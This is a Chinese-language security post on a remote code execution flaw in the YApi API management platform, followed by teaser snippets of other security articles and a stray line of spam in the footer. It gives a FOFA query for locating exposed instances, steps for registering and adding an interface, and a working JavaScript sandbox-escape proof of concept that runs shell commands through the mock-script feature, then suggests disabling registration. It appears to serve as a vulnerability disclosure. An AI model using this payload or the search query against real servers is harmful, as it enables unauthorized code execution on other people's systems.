<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    Yapi Mock 遠程代碼執行漏洞

    VSole2021-07-09 08:43:59

    漏洞描述

    YApi接口管理平臺遠程代碼執行0day漏洞,攻擊者可通過平臺注冊用戶添加接口,設置mock腳本從而執行任意代碼。鑒于該漏洞目前處于0day漏洞利用狀態,強烈建議客戶盡快采取緩解措施以避免受此漏洞影響

    Fofa:app="YApi"
    

    默認開啟注冊功能

    注冊后新建項目

    添加接口

    高級Mock>腳本>開啟,寫入POC并保存:

    const sandbox = this
    const ObjectConstructor = this.constructor
    const FunctionConstructor = ObjectConstructor.constructor
    const myfun = FunctionConstructor('return process')
    const process = myfun()
    mockJson = process.mainModule.require("child_process").execSync("whoami && ps -ef").toString()
    

    保存后預覽:

    Yapi作者已經停止更新。臨時修復建議禁止用戶注冊,具體配置參考原文鏈接:

    https://github.com/YMFE/yapi/issues/2099

    遠程代碼執行漏洞mock
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    YApi 是高效、易用、功能強大的 api 管理平臺是國內某旅行網站的大前端技術中心開源項目,使用mock數據/腳本作為中間交互層,為前端后臺開發與測試人員提供更優雅的接口管理服務,該系統被國內較多知名互聯網企業所采用。
    YApi接口管理平臺遠程代碼執行0day漏洞,攻擊者可通過平臺注冊用戶添加接口,設置mock腳本從而執行任意代碼。
    Laravel官方發布安全通告,修復了一個存在于Laravel中的遠程代碼執行漏洞漏洞編號:CVE-2021-43503,漏洞威脅等級:嚴重,漏洞評分:9.8。
    ?云安全風險情報
    2023-09-26 13:48:20
    當前各行業基礎設施和服務向云逐漸遷移,隨之而來針對云上資產的攻擊也不斷出現,掌握云上風險態勢成為企業安全的重要環節。騰訊安全基于云原生安全體系,通過實時監測各類針對云上資產的攻擊行為,持續感知在野攻擊情況。經過安全專家的分析和挖掘,漏洞是攻擊鏈上的重要一環,既能看到“老而彌新”漏洞的自動化批量攻擊,也可發現新曝光漏洞開始迅速武器化,此外還涉及一些尚未公開的潛在風險被攻擊者利用。
    筆者片面的從多年乙方經驗(不涉及監管層面能拿到的數據)的技術層面來討論下大攻防演練多人運動下的溯源反制思路,以及作為反制團隊如何與藍隊其他成員之間進行配合反制相關的工作。 如有寫的不對的地方及遺漏的地方(肯定有的),請多多交流。
    鑒于該漏洞影響范圍較大,建議客戶盡快做好自查及防護。處置建議1、安全更新: 目前官方已發布安全更新,建議受影響客戶安裝更新 https://github.com/top-think/framework/releases2、自查方案: ThinkPHP 6 打開app/middleware.php 如果 \think\middleware\LoadLangPack::class 沒有注釋,代表著受此漏洞影響。
    對此,安識科技建議廣大用戶及時升級到安全版本,并做好資產自查以及預防工作,以免遭受黑客攻擊。GitLab 主要對 group 和 project 兩個維度進行代碼和文檔管理。漏洞危害 攻擊者可利用該漏洞通過 GitHub API 構造惡意數據執行遠程代碼攻擊,最終獲取服務器最高權限。解決方案 當前官方已發布最新版本,建議受影響的用戶及時更新升級到最新版本。
    鑒于該漏洞影響范圍極大,建議企業盡快做好自查及防護。
    近日,瑞星公司發布《2021年中國網絡安全報告》,該報告綜合瑞星“云安全”系
    0x01 漏洞概述IBM WebSphere Application Server在今年6月發布了一則漏洞通告,cve編號為:CVE-2020-4450。該漏洞允許攻擊者通過iiop向WAS進行網絡請求,最終在WAS上執行任意代碼。
    VSole
    網絡安全專家
      亚洲 欧美 自拍 唯美 另类